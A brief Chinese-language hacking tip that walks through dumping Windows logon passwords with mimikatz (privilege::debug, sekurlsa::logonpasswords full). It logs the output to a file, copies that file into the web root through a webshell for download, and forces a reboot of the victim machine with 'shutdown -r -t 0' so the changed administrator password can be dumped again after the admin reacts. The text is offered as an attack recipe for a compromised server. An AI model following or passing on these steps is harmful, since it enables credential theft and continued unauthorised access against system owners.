1.打印(输出)mimikatz执行过程的log.
D:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.读取的密码导出在mimikatz的目录,然后用webshell 将log文件copy到web下,在线访问:
D:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
如果你登录后,管理员发现有人登录,修改了登录密码,
导致你登录不上了,但是使用mimikatz读取的密码还是之前的,
你可以在webshell里重启他的电脑,然后在执行以上步骤….
命令:
shutdown -r -t 0
这样子,在不创建系统账号的情况下也能读取到管理员的密码….